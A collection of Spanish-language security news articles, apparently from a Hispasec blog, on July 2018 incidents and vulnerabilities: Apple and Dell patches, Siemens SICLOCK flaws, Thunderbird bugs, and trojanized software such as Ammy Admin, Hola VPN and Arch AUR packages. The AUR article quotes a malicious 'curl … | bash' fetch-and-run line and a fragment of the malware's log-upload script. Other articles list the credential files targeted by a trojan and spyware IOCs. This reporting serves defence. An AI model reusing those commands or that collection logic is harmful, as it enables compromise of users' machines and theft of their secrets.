Actualizaciones para múltiples productos Apple

Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en los productos iOS, macOS, watchOS, tvOS, Safari, e iTunes e iCloud para Windows. Entre todos los productos se corrigen 109 fallos de seguridad.

Los boletines publicados con las actualizaciones y problemas solucionados se resumen a continuación.

El boletín para el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), iOS 11.4.1, resuelve 22 vulnerabilidades relacionadas con múltiples componentes, entre los que se incluyen ‘Wi-Fi’‘Emoji’, el kernel y‘WebKit’ entre otros. Uno de los fallos permitiría a una web maliciosa suplantar la URL mostrada para hacer creer a los usuarios que se encuentran en un sitio web legítimo (CVE-2018-4277, también presente en macOS, watchOS y tvOs).

macOS High Sierra 10.13.6 y los Security Update 2018-004 para Sierra y El Capitán. En este caso se solucionan 11 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘APFS’, ‘ATS’, ‘IOGraphics’, ‘CFNetwork’, ‘CoreCrypto’ y el kernelTres de estas vulnerabilidades podrían permitir elevar privilegios (CVE-2018-4280 y CVE-2018-4285) y/o ejecutar código arbitrario con privilegios de ‘kernel’ (CVE-2018-4268).

Safari 11.1.2 cuenta con otro boletín que soluciona 16 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador. También varios de los errores corregidos permitirían que una web maliciosa suplantase la URL mostrada al usuarios para hacerle creer que se encuentran en un sitio web legítimo(CVE-2018-4260, CVE-2018-4274 y CVE-2018-4279).

El boletín para el sistema operativo de los relojes inteligentes de Apple, watchOS 4.3.2, soluciona 14 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario(CVE-2018-4262, CVE-2018-4264, CVE-2018-4272 y CVE-2018-4284) y la elevación de privilegios (CVE-2018-4280).

tvOS, el sistema operativo de los televisores de la marca, se actualiza a la versión 11.4.1, donde se corrigen 18 vulnerabilidades en múltiples componentes. Ocho de ellas podrían permitir la ejecución remota de código (del CVE-2018-4261 al CVE-2018-4265, CVE-2018-4267, CVE-2018-4272, CVE-2018-4284) y otra elevar privilegios en el sistema (CVE-2018-4280).

Las versiones iTunes 12.8 e iCould 7.6 para Windows corrigen 14 vulnerabilidades cada una, algunas también de gravedad alta.
Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.

Más información:
 
iOS 11.4.1:
https://support.apple.com/kb/HT208938

macOS High Sierra 10.13.6 y Security Update 2018-004 para Sierra y El Capitán:

Google dará el tiro de gracia a los sitios HTTP en 10 días

El popular navegador Google Chrome marcará como no seguros los sitios web que sirvan su contenido usando HTTP en vez de su versión autenticada y cifrada HTTPS, como parte del esfuerzo de Google de hacer Internet más seguro

A poco que te muevas por Internet, si usas Google Chrome para navegar es bastante posible que éste te haya avisado de que cierto sitio no era seguro. A veces porque el responsable de la web olvidó actualizar el certificado HTTPS (tienen caducidad), otras veces porque la página web envía sin cifrar contraseñas o información de tarjetas de créditos… La cuestión es que te salta un aviso, a veces bastante difícil de esquivar, informándote de que la página no es segura.

Como ya muchos sabréis, HTTP es el protocolo clásico para servir páginas web (que son principalmente contenido HTML) en InternetEl problema de HTTP es que no permite saber si efectivamente quien sirve la web es quien dice ser, y que la información viaja sin cifrar entre el navegador y el servidor. Esto es un problema, ya que permite a un atacante situado entre el navegador y el servidor espiar y modificar el tráfico, entre otros escenarios.

Hace un par de años Google anunció que en enero de 2017 iba a empezar a marcar como no seguros los sitios HTTP que manejase contraseñas e información de tarjetas de crédito. Este fue el primer paso dado por Google hacia un objetivo final: marcar todas las páginasHTTP como no seguras. Las estadísticas que dieron en febrero de este año avalan esta decisión: más de dos tercios del tráfico que pasa por las versiones de Android y Windowsestá protegido, así como más de tres cuartos del de Chrome OS y Mac. También afirman que 81 de los 100 sitios en el top 100 usan HTTPS por defecto.

Para los usuarios, esto no tiene más que ventajas, pero ¿qué pasa con los responsables de las webs? Ya sabemos que la seguridad no suele ser cómoda y que una medida de seguridad es una configuración más, pero hoy en día hay miles de tutoriales para ello, y muchos servicios de creación de páginas web incluyen la opción de activarlo con un solo click. Y si no cuentas con el apoyo de una plataforma, al menos te queda el consuelo de que con iniciativas como Let’s Encrypt te sale gratis.

Amigo webmaster, ya no te quedan excusas.
 

Más información:

 

Roban las claves privadas de un popular monedero de Ethereum a través de la extensión Hola VPN.

Ha sido comprometido el código publicado por Hola VPN en Chrome Web Store añadiendo capacidades para el robo de la clave privada del monedero para la criptomoneda Ethereum MyEtherWallet.
 
 
Según informan en el canal de Twitter del MyEtherWallet, el código fraudulento ha estado disponible 5 horas. Durante esas 5 horas todos los usuarios de Hola VPN que hayan accedido a la web de MyEtherWallet han sufrido el robo de la clave privada de su “wallet” por lo que lo más seguro es que su cartera haya sido sustraída. Es importante conocer que las extensiones de Google Chrome se actualizan automáticamente.
 
Cabe la posibilidad de que el atacante no haya transferido los fondos por lo que lo más recomendable sería que se transfirieran los ETH posiblementes sustraídos a otro wallet alternativo para evitar que el atacante pueda hacerse con el control de ellos.
 
El tema de las extensiones del navegador representa un punto bastante serio en seguridad, las posibilidades que ofrece a un atacante hacerse con el control de una extensión con capacidad de modificar e interactuar con cualquier web que el usuario renderice en su navegador, abre las puertas a los atacantes a usarlas para el robo de casi cualquier credencial electrónica.
 
En este caso ha sido un monedero de Ethereum pero podría haber sido la web de un banco, la cuenta de Netflix o los credenciales de acceso a las cámaras de seguridad de su casa.
Más información:
 

Se propaga una versión maliciosa del software Ammy Admin

Durante los días 13 y 14 de julio la aplicación descargada desde la web oficial del software de control de escritorio remoto Ammy Admin contenía software malicioso.

Se ha verificado que los días señalados, el software gratuito incluía un malware bancario y troyano detectado por ESET como Win32/Kasidet.

Este malware tenía dos objetivos principales:

1. Robar archivos que puedan contener credenciales y/o monederos de criptomonedas. Para ello el software buscaba nombres de archivos que coincidieran con:

  • pass.txt
  • passwords.txt
  • wallet.dat
  • bitcoin

2. Reportar procesos que incluyan alguna de las siguientes características:

  • armoryqt
  • bitcoin
  • exodus
  • electrum
  • jaxx
  • keepass
  • kitty
  • mstsc
  • multibit
  • putty
  • radmin
  • vsphere
  • winscp
  • xshell

La URL del C&C está detectada en VT por 8/67 antivirus:
https://www.virustotal.com/#/url/b2d4d7676b8fd81b257a96adf2a025402148bfae539cb347116bea54bb81fa09/detection

Aunque si verificamos directamente los hashes de las muestras, podemos ver que tienen un ratio de detección mayor al del C&C.

Instaladores:
Servicio:
No es la primera noticia de las que hemos hablado en Una al día sobre alteración de un software legítimo para añadirle contenido malicioso, de hecho, las noticias de los dos últimos días van encaminadas en este sentido, estas noticias son:
Malware hallado en el repositorio AUR de Arch Linux
Roban las claves privadas de un popular monedero de Ethereum a través de la extensión Hola VPN.

Desde Hispasec recomendamos a los usuarios mantener sus antivirus activos y actualizados a la hora de descargar cualquier software. Y, en caso de duda, verificar por algun servicio adicional para asegurarnos que no incluya software malicioso en el código.

Más información:
 
Web oficial de Ammy Admin:

Malware hallado en el repositorio AUR de Arch Linux

Se han hallado varios scripts maliciosos en el repositorio AUR de la distribución Arch Linux.

Arch Linux es una distribución Linux para, en general, usuarios avanzados, sin añadidos (bloatware) y con un modelo de publicación basado en “rolling release” (publicación continua de las versiones más recientes de los paquetes).

Debido a la celeridad en la producción y demanda de paquetes actualizados, la comunidad creó el sistema AUR (Arch User’s Repository) para que fuesen los propios usuarios los que subieran los scripts PKGBUILD. Estos scripts permiten adaptar la compilación e instalación de cualquier código fuente a Arch.

Los tres scripts hallados, con contenido malicioso, son :

acrored 9.5.5-8
balz 1.20-3
minergate 8.1-2

Centrándonos en el script correspondiente a ‘acroread’, vemos el contenido cambiado por el usuario denominado ‘xeactor’:

La línea “curl -s https://ptpb.pw/~x|bash -&” descarga un shell script con curl y seguidamente lo ejecuta. En el momento de escribir estas líneas aun estaba disponible en el servidor, el contenido (por si acaso) era el siguiente:

Instala un servicio que ejecuta cada cierto tiempo el script instalado en ‘/usr/lib/xeactor/u.sh’. Dicho script, a su vez, es descargado del mismo servidor (también disponible cuando esto fue escrito) desde ‘https://ptpb.pw/~u‘ y contenía el siguiente código:

Básicamente, recolecta información de la máquina “infectada” y la envía a pastebin. En efecto, la parte que se ve en rojo es su propia clave privada de pastebin. De hecho ya hay gente que la habría usado para mofarse del creador de este “malware”:

Otros usuarios han comentado en Reddit que “xeactor” podría estar preparando esta infección para minar, debido al historial de ese apodo relacionado con dicha tecnología:

Y en efecto, aunque es una afirmación atrevida, tirando de caché de Google sí se observa dicha relación (reitero, esto no probaría que esa fuese su intención final, pero abre esa posibilidad):

Respecto al sitio donde cuelgan los scripts, https://ptpb.pw/, es un gestor de “pastes”, del estilo del glorioso ‘pastebin’ y similares así como acortador de URLs, por lo que es posible que los scripts hayan sido, simplemente, subidos a esa plataforma sin relación alguna con el atacante. De hecho el método que habría usado es este en concreto:

Vamos a comprobarlo:

No sabremos las intenciones reales de tal usuario, porque el plan parecía de algún modo inacabado. No obstante, de haberlo llevado más lejos, nada le hubiera parado para instalar un minero u otro tipo de malware con mayor carga. Es más, incluso esta parte del código:

FULL_LOG="$(full_log)"
$uploader "$FULL_LOG"
for x in /root /home/*; do
 if [[ -w "$x/compromised.txt" ]]; then
  echo "$FULL_LOG" > "$x/compromised.txt"
 fi
done
exit 0


Deja un archivo con el contenido del log en los directorios /root y todos los /home de la máquina afectada, algo que resulta muy llamativo y evidente y que no dejaría pasar un usuario. Habitualmente, el malware dañino de cuida mucho de dejar esas pistas delante de la víctima, en este caso ni se ha encontrado una carga maliciosa ni oculta del todo sus operaciones. ¿Querría avisar 'xeactor' de la facilidad con la que se puede desatar una infección a los usuarios de Arch Linux? ¿O quizás eran sus intenciones más oscuras y esto solo era una prueba de concepto?
Más información:
 

Golden Cup: el malware espía que aprovecha el Mundial para robar tu información

A lo largo de este año las Fuerzas de Defensa de Israel han sido el objetivo de diferentes campañas de malware espía: familias como “GlanceLove” o “WinkChat” utilizaban técnicas de ingeniería social para sustraer todo tipo de información de los soldados. El pasado 3 de julio, el equipo de ClearSky informaba de una nueva familia de malware para Android dirigida a ciudadanos israelíes.

 

En esta ocasión el malware utiliza la fiebre del Mundial de Rusia para conseguir sus objetivos. La aplicación “Golden Cup“, aparentemente legítima, podía descargarse de Google Play y utilizarse para mostrar en tiempo real los resultados de los partidos. Tras ella se escondía el malware que se descargaba en varias fases con objeto de eludir a los sistemas de seguridad.

Una vez instalada la aplicación se establecía la comunicación con el C&C utilizando el protocolo de transporte MQTT a través del puerto 1883.

Conexión MQTT. Fuente: www.symantec.com

A partir de ahora el malware puede recibir órdenes del servidor de C&C y actualizar el estado del dispositivo.

De forma complementaria se establece una comunicación HTTP, utilizada por el dispositivo para descargar el payload malicioso y para enviar al servidor de C&C la información recopilada. Esto ocurre en dos fases:

Una primera fase en la que se envía información sobre el dispositivo: aplicaciones instaladas, su estado, etc.

Información enviada en la fase 1. Fuente: www.symantec.com

Una segunda fase en la que se descarga otro fichero .dex que implementará varios servicios:

  • ConnManager, para gestionar la conexión con el C&C.
  • ReceiverManager que monitoriza llamadas entrantes e instalaciones de nuevas aplicaciones.
  • TaskManager encargado de gestionar los datos que se van almacenando.
Comandos disponibles en TaskManager. Fuente: www.symantec.com

Como se observa de los comandos que acepta el servicio TaskManager, el virus tiene la capacidad de compartir la ubicación actual, utilizar la cámara y el microfono, además de obtener información sobre los contactos y de otro tipo.

En Koodous podemos encontrar algunas muestras

Otros IOCs:

Nombres de paquete:

  • anew.football.cup.world.com.worldcup
  • com.coder.glancelove
  • com.winkchat

Hash del fichero DEX:

  • afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e

Dominios e IP:

  • goldncup[.]com
  • glancelove[.]com
  • autoandroidup[.]website
  • mobilestoreupdate[.]website
  • updatemobapp[.]website
  • 107[.]175[.]144[.]26
  • 192[.]64[.]114[.]147
Más información:
 
Infrastructure and Samples of Hamas’ Android Malware Targeting Israeli Soldiers
https://www.clearskysec.com/glancelove/

Hamas Uses Fake Facebook Profiles to Target Israeli Soldiers
https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/

Detectadas graves vulnerabilidades en dispositivos SCADA Siemens SICLOCK

En un reciente reporte de la multinacional Siemens, se alerta de graves vulnerabilidades remotas presentes en los dispositivos de control de planta SICLOCK TC que, dada su antigüedad, no van a ser actualizados, siendo necesario aplicar las contramedidas publicadas.

Los dispositivos Siemens SCADA, pertenecientes a la familia SICLOCK TC, se utilizan para proporcionar un sistema de sincronización de la hora dentro de una central de pequeña o mediana escala, en caso que el dispositivo principal fallase.

Las vulnerabilidades reportadas afectarían a los dispositivos SICLOCK TC100 y TC400, en todas sus versiones. Según el reporte facilitado, se habrían detectado 6 vulnerabilidades, como denegaciones de servicio, salto de restricciones de autenticación o modificación del firmware, siendo el listado completo el siguiente:

CVE-2018-4851 – Denegación de servicio.
CVE-2018-4852 – Salto de restricciones del sistema de autenticación.
CVE-2018-4853 – Modificación del firmware del dispositivo a través del puerto UDP 69.
CVE-2018-4854 – Modificación del cliente de administración presente en el dispositivo a través del puerto UDP 69. Un atacante podría de esta manera ejecutar código en el sistema del cliente que utilice una versión modificada.
CVE-2018-4855 – Revelación de credenciales sin cifrar, tanto en los ficheros de configuración, como durante el tráfico de red, permitiendo a un atacante con acceso obtener los credenciales de forma sencilla.
CVE-2018-4856 – Un atacante con permisos administrativos podría bloquear usuarios ya registrados en el dispositivo. Sólo mediante el acceso físico al dispositivo se podrían revertir los cambios.

Aunque no se han detectado ataques o exploits públicos que reproduzcan estas vulnerabilidades, Siemens ha proporcionado las contramedidas necesarias para proteger los dispositivos de estos ataques.
Al encontrarse estos dispositivos en el fin de ciclo de soporte, no se van a publicar actualizaciones de firmware por el momento, según el fabricante.

 

Más información:
 
SSA-197012: Vulnerabilities in SICLOCK central plant clocks

Stylish: La extensión del navegador que se queda con lo que visitas

Una extensión para los navegadores Google Chrome y Mozilla Firefox dedicada a modificar la apariencia de las webs, conocida como Stylish, se dedicaba a mandar lo visitado por el usuario a servidores de SimilarWeb, la empresa detrás de ésta

“De buen gusto”, dice la página de diccionarios en línea WordReference.com que significa “stylish“, entre otras acepciones. La verdad es que de buen gusto no se puede decir que haya sido lo que ha hecho SimilarWeb, la empresa detrás de esta famosa extensión. Y no decimos “famosa” como manida coletilla periodística, estamos hablando de la que ha sidola extensión de referencia con su funcionalidad: permitir especificar hojas de estilo personalizadas para modificar la apariencia de una web. Los datos: cerca de dos millones de usuarios en Google Chrome, y casi trescientos mil en Mozilla Firefox. Datos extraídos gracias a la caché de Google, ya que ambas versiones han desaparecido de las páginas de Chrome y Firefox.

La mecánica del espionaje es sencilla: Este tipo de extensiones necesitan acceder a laURL del navegador para saber si está en una página a la que debe aplicar una hoja de estilos personalizada. Y ya que accedes a la URL, pues te la quedas y la envías a tus servidores, que hay empresas que compran el historial de visitas de la gente… ¿Qué hay de malo en ésto? Bueno, éstas empresas estudian los hábitos de navegación de la gente, y de las peores cosas que pueden hacer dentro de la legalidad es venderle a otra empresa que a una persona en concreto le gustan los nomos de jardín. Así, esa última empresa como anunciante en Internet te puede bombardear con publicidad sobre unos nomos chulísimos cada vez que pases por una página que contiene anuncios gestionados por esa empresa.

En realidad, que Stylish se dedicase a esos menesteres no es una novedad. Cuando fue comprado a un desarrollador independiente por SimilarWeb en enero de 2017, ésta anunció que iba a recopilar ciertos datos “anónimos” sobre los usuarios. De hecho, ese mismo mes se publicó un artículo avisando de este cambio en la política de privacidad, donde se comentaba que efectivamente se obtenía información sobre los sitios que se visitaban. Lo que pasa es que a veces es necesario escribir un artículo incendiariocomo el de Robert Heaton, con capturas de pantalla donde se ve claramente cómo mandan esa información a los servidores de SimilarWeb:

Extraída de robertheaton.com

Como ya comentábamos en otra Una-al-díaexisten distintos tipos de datos personales, y los que probablemente recopila SimilarWeb son datos personales despersonalizados. Es decir, datos personales que conforman un perfil, pero que no se asocian directamente a una persona. El problema es que es demasiado fácil, a pesar de recopilarlos sin identificar a la persona en concreto, terminar vinculándolos a una. Y es que como dice Robert Heaton en su artículo, si saben que alguien está visitando https://www.linkedin.com/in/<NOMBRE_DE_USUARIO>/edit/ (página visitada por un usuario para modificar su perfil), ¿quién podrá ser ese usuario? Guiño, guiño.

En definitiva, se dice que “si un servicio es gratis, el producto eres tú”, y este es otro caso más. Otra de las acepciones de “stylish” según WordReference.com es “a la moda, que también hace justicia al concepto recopilar datos personales para luego venderlos: está de moda. Y lo que nos queda.

Más información:
 
“Stylish” browser extension steals all your internet history
https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/

Major Stylish add-on changes in regards to privacy
https://www.ghacks.net/2017/01/04/major-stylish-add-on-changes-in-regards-to-privacy/

Vulnerabilidades en iDRAC – PowerEdge Dell EMC

El equipo de seguridad de Dell a corregido 4 vulnerabilidades que pueden ser explotadas por usuarios maliciosos en iDRAC.

¿Qué es iDRAC?

Integrated Dell Remote Access Controller‘ (iDRAC) permite implementar, actualizar, supervisar y mantener los servidores Dell PowerEdge con o sin un agente de software de administración de sistemas. Se encuentra integrado dentro del servidor por lo que iDRAC no requiere de un sistema operativo o un hipervisor para funcionar.

iDRAC ofrece al administrador un panel intuitivo para supervisar el sistema
Visión global del sistema

Simplifica las tareas de administración del ciclo de vida del servidor, como el aprovisionamiento, implementación, mantenimiento, instalación de parches y actualizaciones.

Algunas de sus funciones:

  • Energía: Los administradores entre otras cosas pueden en caso de bloqueo del sistema realizar un reinicio del servidor.
  • Consola: EL administrador puede interactuar con el servidor a través de la consola remota, evitando estar físicamente delante de la máquina en caso de perder la conexión con el sistema operativo.
  • Medios virtuales: Permite montar imágenes de disco compartidas en red.

También permite supervisar la temperatura, ventiladores y los eventos del sistema.

La consola web de iDRAC9 permite supervisar los eventos del sistema
Supervisión de logs en iDRAC9

Vulnerabilidades reportadas:


CVE-2018-1249

Las versiones de Dell EMC iDRAC9 anteriores a 3.21.21.21 no exigen el uso de TLS/SSL para establecer la conexión con el servidor web de iDRAC en ciertas URLs. Un atacante podría explotar esta vulnerabilidad para realizar un ataque ‘mitm‘ (man-in-the-middle) y evitar que el cliente establezca una conexión cifrada con el servidor.

https://nvd.nist.gov/vuln/detail/CVE-2018-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1249


CVE-2018-1244

Tanto las versiones anteriores a 2.60.60.60 de Dell EMC iDRAC7/iDRAC8 como 3.21.21.21 de iDRAC9 contienen una vulnerabilidad de inyección de comandos en el agente SNMP. Un atacante autenticado podría aprovechar esta vulnerabilidad para ejecutar comandos arbitrarios en iDRAC, donde las alertas de SNMP están habilitadas.

https://nvd.nist.gov/vuln/detail/CVE-2018-1244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1244


CVE-2018-1212

La consola de diagnóstico web en Dell EMC iDRAC6 (todas las versiones modulares) contiene una vulnerabilidad de inyección de comandos. Un usuario malicioso autenticado de forma remota con acceso a la consola de diagnóstico podría explotar esta vulnerabilidad para ejecutar comandos arbitrarios como root en el sistema que no se encuentre actualizado.

https://nvd.nist.gov/vuln/detail/CVE-2018-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1212


CVE-2018-1243

Las versiones anteriores a 2.91 de iDRAC6, 2.60.60.60 en iDRAC7/iDRAC8, así como 3.21.21.21 en iDRAC9, contienen una vulnerabilidad de ID de sesión CGI débil. Las sesiones invocadas a través de binarios CGI utilizan valores de 96 bits, lo que facilita a los atacantes remotos realizar ataques de fuerza bruta.

https://nvd.nist.gov/vuln/detail/CVE-2018-1243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1243


Breve introducción donde se pueden apreciar algunas funciones de iDRAC9

Dell ya ha publicado un documento de soporte para solucionar las vulnerabilidades comentadas anteriormente, así como consejos para mantener al día el firmware de iDRAC.

Vulnerabilidades críticas en Thunderbird 52.9

Mozilla Fundation Security ha corregido varias vulnerabilidades críticas que afectan a Thunderbird 52.9

 

Mozilla Thunderbird es un cliente de correo electrónico multiplataforma de código abierto y libre, cliente de noticias, cliente de RSS y de chat desarrollado por la Fundación Mozilla. Utiliza el lenguaje de interfaz XUL y viene instalado por defecto en los sistemas de escritorio de Ubuntu.

Thunderbird es un cliente multiplataforma por lo que se puede instalar fácilmente en Windows 10
Gestor de correo Thunderbird en Windows 10

Entre sus características podemos destacar:

  •  Cifrado PGP
  •  Filtros de correo
  •  Lector RSS
  •  Filtro anti-spam

Con respecto al informe redactado por el equipo de Mozilla Fundation Security, podemos destacar algunas de las vulnerabilidades corregidas:

CVE-2018-12372
Un atacante podría hacer uso de un ataque ‘EFAIL’ para explotar las vulnerabilidades en los estándares ‘OpenPGP’ ‘S/MIME’ para revelar en texto plano los correos electrónicos encriptados.

EFAIL explota vulnerabilidades en los estándares OpenPGP y S/MIME para revelar el texto plano correos electrónicos que han sido cifrados. EFAIL abusa del contenido activo de los correos electrónicos HTML, por ejemplo, imágenes o estilos cargados externamente, para filtrar el texto sin formato a través de las URL solicitadas.

Ataque EFAIL realizado sobre los estándares OpenPGP y S/MIME
Ataque EFAIL – Extraido de efail.de

Sin embargo es necesario que un atacante tenga acceso a correos cifrados:

  • Interceptando tráfico de la red.
  • Comprometiendo cuentas de correo, servidores de correo, backups o equipos.
Ataque EFAIL en Thunderbird – Prueba de concepto

CVE-2018-12359
Un desbordamiento de búfer puede ocurrir cuando se renderiza contenido de lienzo cuando se ajusta dinámicamente el alto y el ancho del elemento, haciendo que los datos se escriban fuera de los límites calculados.

https://access.redhat.com/security/cve/cve-2018-12359


CVE-2018-12373
Las partes S/MIME descifradas, cuando se incluyen en HTML diseñado para un ataque, pueden filtrar texto sin formato cuando se incluyen en una respuesta/reenvío HTML.

https://es.wikipedia.org/wiki/S/MIME
https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2018-12372


CVE-2018-12362
Puede ocurrir un desbordamiento (Integer Overflow) durante las operaciones gráficas realizadas por SSSE3 (Supplemental Streaming SIMD Extensions 3).

https://en.wikipedia.org/wiki/SSSE3
https://access.redhat.com/security/cve/cve-2018-12362


Han comunicado que estas vulnerabilidades no pueden ser explotadas en el gestor de correo de Thunderbird al leer mensajes, ya que la ejecución de scripts está deshabilitada por defecto, sin embargo advierten que se corre riesgo en el navegador o contextos similares al navegador.

Se recomienda actualizar la aplicación desde el sitio web del fabricante o en su defecto desde repositorios oficiales.

Security vulnerabilities fixed in Thunderbird 52.9 – Mozilla
https://www.mozilla.org/en-US/security/advisories/mfsa2018-18/#CVE-2018-12364